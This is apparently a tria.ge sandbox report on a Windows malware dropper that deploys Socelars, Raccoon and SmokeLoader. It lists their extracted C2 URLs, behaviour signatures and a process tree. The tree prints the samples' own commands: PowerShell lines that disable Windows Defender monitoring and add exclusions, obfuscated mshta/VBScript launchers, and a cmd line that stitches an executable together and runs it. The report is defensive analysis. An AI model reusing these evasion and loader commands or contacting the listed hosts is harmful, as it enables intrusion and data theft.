Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

022e3c30a1...66.exe

windows7_x64

10

022e3c30a1...66.exe

windows11_x64

10

022e3c30a1...66.exe

windows10_x64

10

4d27dca0a1...ef.exe

windows7_x64

10

4d27dca0a1...ef.exe

windows11_x64

10

4d27dca0a1...ef.exe

windows10_x64

10

578a3a7a2b...b3.exe

windows7_x64

10

578a3a7a2b...b3.exe

windows11_x64

10

578a3a7a2b...b3.exe

windows10_x64

10

9c4880a98c...82.exe

windows7_x64

10

9c4880a98c...82.exe

windows11_x64

10

9c4880a98c...82.exe

windows10_x64

10

a1dad4a83d...c4.exe

windows7_x64

10

a1dad4a83d...c4.exe

windows11_x64

10

a1dad4a83d...c4.exe

windows10_x64

10

acf1b7d80f...e0.exe

windows7_x64

10

acf1b7d80f...e0.exe

windows11_x64

10

acf1b7d80f...e0.exe

windows10_x64

10

cbf31d825a...d2.exe

windows7_x64

10

cbf31d825a...d2.exe

windows11_x64

10

cbf31d825a...d2.exe

windows10_x64

10

db76a117db...12.exe

windows7_x64

10

db76a117db...12.exe

windows11_x64

10

db76a117db...12.exe

windows10_x64

10

e2ffb8aeeb...f6.exe

windows7_x64

10

e2ffb8aeeb...f6.exe

windows11_x64

10

e2ffb8aeeb...f6.exe

windows10_x64

10

f2196668f4...cb.exe

windows7_x64

10

f2196668f4...cb.exe

windows11_x64

10

f2196668f4...cb.exe

windows10_x64

10

Resubmissions

10/11/2021, 14:50

211110-r7nbvaeddr 10

08/11/2021, 16:12

211108-tnmmbahgaj 10

08/11/2021, 15:26

211108-svdsbaccf6 10

08/11/2021, 14:48

211108-r6lfvshdfn 10

Analysis

  • max time kernel
    159s
  • max time network
    159s
  • platform
    windows7_x64
  • resource
    win7-en-20211014
  • submitted
    10/11/2021, 14:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe

  • Size

    4.6MB

  • MD5

    4f85f62146d5148f290ff107d4380941

  • SHA1

    5c513bcc232f36d97c2e893d1c763f3cbbf554ff

  • SHA256

    578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3

  • SHA512

    bc4ae4f7101b20ab649ea2a44d5da42875af5068c33c1772960c342cc8731bddfdabd721fb31a49523ea957615252d567a00346035bddacfa58cf97853587594

Score
10/10
raccoonsmokeloadersocelars2f2ad1a1aa093c5a9d17040c8efd5650a99640b5aspackv2backdoorevasionspywarestealersuricatatrojan

Malware Config

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.efxety.top/

Extracted

Family

raccoon

Botnet

2f2ad1a1aa093c5a9d17040c8efd5650a99640b5

Attributes
  • url4cnc

    http://telegatt.top/oh12manymarty

    http://telegka.top/oh12manymarty

    http://telegin.top/oh12manymarty

    https://t.me/oh12manymarty

rc4.plain
rc4.plain

Extracted

Family

smokeloader

Version

2020

C2

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/
rc4.i32
rc4.i32

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Socelars Payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata
  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

    suricata
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Downloads MZ/PE file
  • Executes dropped EXE 22 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 2 IoCs
    evasion
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 16 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Suspicious use of SetThreadContext
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    PID:872
  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:460
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:852
    • C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
      "C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe"
      1⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1284
      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
        "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:468
        • C:\Users\Admin\AppData\Local\Temp\7zS4D13E436\setup_install.exe
          "C:\Users\Admin\AppData\Local\Temp\7zS4D13E436\setup_install.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:620
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
            4⤵
              PID:1808
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1720
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
              4⤵
                PID:1964
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                  5⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1904
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c Tue19ac3c92c21.exe
                4⤵
                • Loads dropped DLL
                PID:1552
                • C:\Users\Admin\AppData\Local\Temp\7zS4D13E436\Tue19ac3c92c21.exe
                  Tue19ac3c92c21.exe
                  5⤵
                  • Executes dropped EXE
                  • Checks computer location settings
                  • Loads dropped DLL
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1940
                  • C:\Users\Admin\Pictures\Adobe Films\v8S88c_Pq5QmrZAGrQbVeBm2.exe
                    "C:\Users\Admin\Pictures\Adobe Films\v8S88c_Pq5QmrZAGrQbVeBm2.exe"
                    6⤵
                    • Executes dropped EXE
                    PID:2896
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 1556
                    6⤵
                    • Program crash
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1616
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c Tue19c9e031f4.exe
                4⤵
                  PID:1612
                  • C:\Users\Admin\AppData\Local\Temp\7zS4D13E436\Tue19c9e031f4.exe
                    Tue19c9e031f4.exe
                    5⤵
                    • Executes dropped EXE
                    PID:1328
                  • C:\Users\Admin\AppData\Local\Temp\7zS4D13E436\Tue19c9e031f4.exe
                    "C:\Users\Admin\AppData\Local\Temp\7zS4D13E436\Tue19c9e031f4.exe"
                    5⤵
                    • Executes dropped EXE
                    PID:1952
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c Tue1932df4dae.exe
                  4⤵
                  • Loads dropped DLL
                  PID:1260
                  • C:\Users\Admin\AppData\Local\Temp\7zS4D13E436\Tue1932df4dae.exe
                    Tue1932df4dae.exe
                    5⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:1740
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zS4D13E436\Tue1932df4dae.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zS4D13E436\Tue1932df4dae.exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )
                      6⤵
                        PID:1052
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zS4D13E436\Tue1932df4dae.exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\7zS4D13E436\Tue1932df4dae.exe") do taskkill -iM "%~nXx" /f
                          7⤵
                          • Loads dropped DLL
                          PID:2552
                          • C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe
                            ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ
                            8⤵
                            • Executes dropped EXE
                            PID:2656
                            • C:\Windows\SysWOW64\mshta.exe
                              "C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )
                              9⤵
                                PID:2748
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f
                                  10⤵
                                    PID:888
                                • C:\Windows\SysWOW64\mshta.exe
                                  "C:\Windows\System32\mshta.exe" vBscrIpt: cLosE ( cREatEObjEcT ( "wscript.sHeLl" ). Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 , TruE ) )
                                  9⤵
                                    PID:2300
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E
                                      10⤵
                                        PID:2020
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill -iM "Tue1932df4dae.exe" /f
                                    8⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2672
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c Tue193e530416b51740a.exe
                            4⤵
                            • Loads dropped DLL
                            PID:868
                            • C:\Users\Admin\AppData\Local\Temp\7zS4D13E436\Tue193e530416b51740a.exe
                              Tue193e530416b51740a.exe
                              5⤵
                              • Executes dropped EXE
                              PID:1932
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c Tue19c28f648204dbd4.exe
                            4⤵
                            • Loads dropped DLL
                            PID:1060
                            • C:\Users\Admin\AppData\Local\Temp\7zS4D13E436\Tue19c28f648204dbd4.exe
                              Tue19c28f648204dbd4.exe
                              5⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:1136
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c Tue1968b7ee9058232e8.exe
                            4⤵
                            • Loads dropped DLL
                            PID:1484
                            • C:\Users\Admin\AppData\Local\Temp\7zS4D13E436\Tue1968b7ee9058232e8.exe
                              Tue1968b7ee9058232e8.exe
                              5⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious behavior: MapViewOfSection
                              PID:1596
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c Tue196397c0f84f8.exe
                            4⤵
                            • Loads dropped DLL
                            PID:1948
                            • C:\Users\Admin\AppData\Local\Temp\7zS4D13E436\Tue196397c0f84f8.exe
                              Tue196397c0f84f8.exe
                              5⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:1928
                              • C:\Users\Admin\AppData\Local\Temp\is-VRTEG.tmp\Tue196397c0f84f8.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-VRTEG.tmp\Tue196397c0f84f8.tmp" /SL5="$10162,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS4D13E436\Tue196397c0f84f8.exe"
                                6⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:1360
                                • C:\Users\Admin\AppData\Local\Temp\7zS4D13E436\Tue196397c0f84f8.exe
                                  "C:\Users\Admin\AppData\Local\Temp\7zS4D13E436\Tue196397c0f84f8.exe" /SILENT
                                  7⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:1196
                                  • C:\Users\Admin\AppData\Local\Temp\is-AIDA5.tmp\Tue196397c0f84f8.tmp
                                    "C:\Users\Admin\AppData\Local\Temp\is-AIDA5.tmp\Tue196397c0f84f8.tmp" /SL5="$201A0,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS4D13E436\Tue196397c0f84f8.exe" /SILENT
                                    8⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Suspicious behavior: GetForegroundWindowSpam
                                    PID:2148
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c Tue192c34b1c2f5.exe /mixone
                            4⤵
                            • Loads dropped DLL
                            PID:1748
                            • C:\Users\Admin\AppData\Local\Temp\7zS4D13E436\Tue192c34b1c2f5.exe
                              Tue192c34b1c2f5.exe /mixone
                              5⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:580
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /im "Tue192c34b1c2f5.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS4D13E436\Tue192c34b1c2f5.exe" & exit
                                6⤵
                                  PID:2604
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /im "Tue192c34b1c2f5.exe" /f
                                    7⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2684
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c Tue197e9ec0ff0.exe
                              4⤵
                              • Loads dropped DLL
                              PID:1580
                              • C:\Users\Admin\AppData\Local\Temp\7zS4D13E436\Tue197e9ec0ff0.exe
                                Tue197e9ec0ff0.exe
                                5⤵
                                • Executes dropped EXE
                                • Checks computer location settings
                                • Loads dropped DLL
                                • Suspicious behavior: EnumeratesProcesses
                                PID:1632
                                • C:\Users\Admin\Pictures\Adobe Films\sVuHXHlstXm4Rv3BAyXERSRg.exe
                                  "C:\Users\Admin\Pictures\Adobe Films\sVuHXHlstXm4Rv3BAyXERSRg.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:2860
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 1496
                                  6⤵
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3028
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c Tue193129b31e741ef3.exe
                              4⤵
                                PID:908
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c Tue19cef5687a.exe
                                4⤵
                                • Loads dropped DLL
                                PID:1308
                                • C:\Users\Admin\AppData\Local\Temp\7zS4D13E436\Tue19cef5687a.exe
                                  Tue19cef5687a.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:1332
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c Tue19d1fc7d2654d7a.exe
                                4⤵
                                • Loads dropped DLL
                                PID:1604
                                • C:\Users\Admin\AppData\Local\Temp\7zS4D13E436\Tue19d1fc7d2654d7a.exe
                                  Tue19d1fc7d2654d7a.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:996
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c Tue19cd42a7c874e44.exe
                                4⤵
                                • Loads dropped DLL
                                PID:1480
                                • C:\Users\Admin\AppData\Local\Temp\7zS4D13E436\Tue19cd42a7c874e44.exe
                                  Tue19cd42a7c874e44.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:268
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c Tue19b4b38a7569a9.exe
                                4⤵
                                • Loads dropped DLL
                                PID:408
                                • C:\Users\Admin\AppData\Local\Temp\7zS4D13E436\Tue19b4b38a7569a9.exe
                                  Tue19b4b38a7569a9.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1160
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c Tue19f40f8518b9946.exe
                                4⤵
                                  PID:1544
                          • C:\Windows\system32\rundll32.exe
                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                            1⤵
                            • Process spawned unexpected child process
                            PID:2548
                            • C:\Windows\SysWOW64\rundll32.exe
                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                              2⤵
                              • Modifies registry class
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2560

                          Network

                          MITRE ATT&CK Enterprise v6

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • memory/268-222-0x0000000000F40000-0x0000000000F41000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/268-233-0x000000001AD40000-0x000000001AD42000-memory.dmp

                            Filesize

                            8KB

                            Download

                          • memory/580-200-0x0000000003050000-0x0000000003079000-memory.dmp

                            Filesize

                            164KB

                            Download

                          • memory/580-225-0x0000000000400000-0x0000000002F22000-memory.dmp

                            Filesize

                            43.1MB

                            Download

                          • memory/580-224-0x0000000000240000-0x0000000000289000-memory.dmp

                            Filesize

                            292KB

                            Download

                          • memory/620-94-0x0000000064940000-0x0000000064959000-memory.dmp

                            Filesize

                            100KB

                            Download

                          • memory/620-84-0x000000006B440000-0x000000006B4CF000-memory.dmp

                            Filesize

                            572KB

                            Download

                          • memory/620-88-0x0000000064940000-0x0000000064959000-memory.dmp

                            Filesize

                            100KB

                            Download

                          • memory/620-85-0x000000006B440000-0x000000006B4CF000-memory.dmp

                            Filesize

                            572KB

                            Download

                          • memory/620-86-0x0000000064940000-0x0000000064959000-memory.dmp

                            Filesize

                            100KB

                            Download

                          • memory/620-92-0x0000000064940000-0x0000000064959000-memory.dmp

                            Filesize

                            100KB

                            Download

                          • memory/620-90-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                            Filesize

                            1.5MB

                            Download

                          • memory/620-91-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                            Filesize

                            1.5MB

                            Download

                          • memory/620-89-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                            Filesize

                            1.5MB

                            Download

                          • memory/620-93-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                            Filesize

                            1.5MB

                            Download

                          • memory/620-87-0x000000006B440000-0x000000006B4CF000-memory.dmp

                            Filesize

                            572KB

                            Download

                          • memory/620-96-0x000000006B440000-0x000000006B4CF000-memory.dmp

                            Filesize

                            572KB

                            Download

                          • memory/620-95-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                            Filesize

                            1.5MB

                            Download

                          • memory/620-97-0x000000006B280000-0x000000006B2A6000-memory.dmp

                            Filesize

                            152KB

                            Download

                          • memory/620-98-0x000000006B280000-0x000000006B2A6000-memory.dmp

                            Filesize

                            152KB

                            Download

                          • memory/852-274-0x0000000003270000-0x0000000003375000-memory.dmp

                            Filesize

                            1.0MB

                            Download

                          • memory/852-273-0x00000000004E0000-0x00000000004FB000-memory.dmp

                            Filesize

                            108KB

                            Download

                          • memory/852-266-0x0000000000450000-0x00000000004C2000-memory.dmp

                            Filesize

                            456KB

                            Download

                          • memory/872-262-0x0000000000830000-0x000000000087D000-memory.dmp

                            Filesize

                            308KB

                            Download

                          • memory/872-264-0x00000000028C0000-0x0000000002932000-memory.dmp

                            Filesize

                            456KB

                            Download

                          • memory/996-216-0x0000000000900000-0x0000000000901000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/1160-230-0x0000000000D50000-0x0000000000D51000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/1160-226-0x0000000000300000-0x0000000000301000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/1160-218-0x0000000000150000-0x0000000000151000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/1196-213-0x0000000000400000-0x0000000000414000-memory.dmp

                            Filesize

                            80KB

                            Download

                          • memory/1200-247-0x0000000002990000-0x00000000029A6000-memory.dmp

                            Filesize

                            88KB

                            Download

                          • memory/1284-55-0x0000000075191000-0x0000000075193000-memory.dmp

                            Filesize

                            8KB

                            Download

                          • memory/1332-220-0x0000000000240000-0x00000000002CE000-memory.dmp

                            Filesize

                            568KB

                            Download

                          • memory/1332-206-0x0000000001B80000-0x0000000001BCF000-memory.dmp

                            Filesize

                            316KB

                            Download

                          • memory/1332-221-0x0000000000400000-0x00000000016FB000-memory.dmp

                            Filesize

                            19.0MB

                            Download

                          • memory/1360-209-0x0000000000260000-0x0000000000261000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/1596-229-0x0000000000240000-0x0000000000249000-memory.dmp

                            Filesize

                            36KB

                            Download

                          • memory/1596-231-0x0000000000400000-0x0000000002F02000-memory.dmp

                            Filesize

                            43.0MB

                            Download

                          • memory/1596-208-0x0000000003010000-0x0000000003019000-memory.dmp

                            Filesize

                            36KB

                            Download

                          • memory/1612-196-0x0000000000480000-0x0000000000481000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/1616-272-0x00000000009C0000-0x00000000009C1000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/1632-249-0x0000000003BF0000-0x0000000003D3C000-memory.dmp

                            Filesize

                            1.3MB

                            Download

                          • memory/1720-228-0x0000000002120000-0x0000000002D6A000-memory.dmp

                            Filesize

                            12.3MB

                            Download

                          • memory/1720-246-0x0000000002120000-0x0000000002D6A000-memory.dmp

                            Filesize

                            12.3MB

                            Download

                          • memory/1904-242-0x0000000002080000-0x0000000002CCA000-memory.dmp

                            Filesize

                            12.3MB

                            Download

                          • memory/1904-227-0x0000000002080000-0x0000000002CCA000-memory.dmp

                            Filesize

                            12.3MB

                            Download

                          • memory/1928-201-0x0000000000400000-0x0000000000414000-memory.dmp

                            Filesize

                            80KB

                            Download

                          • memory/1940-248-0x0000000003F30000-0x000000000407C000-memory.dmp

                            Filesize

                            1.3MB

                            Download

                          • memory/2148-217-0x0000000000260000-0x0000000000261000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/2560-261-0x0000000000960000-0x00000000009BD000-memory.dmp

                            Filesize

                            372KB

                            Download

                          • memory/2560-260-0x0000000000AD0000-0x0000000000BD1000-memory.dmp

                            Filesize

                            1.0MB

                            Download

                          • memory/3028-269-0x00000000003A0000-0x00000000003A1000-memory.dmp

                            Filesize

                            4KB

                            Download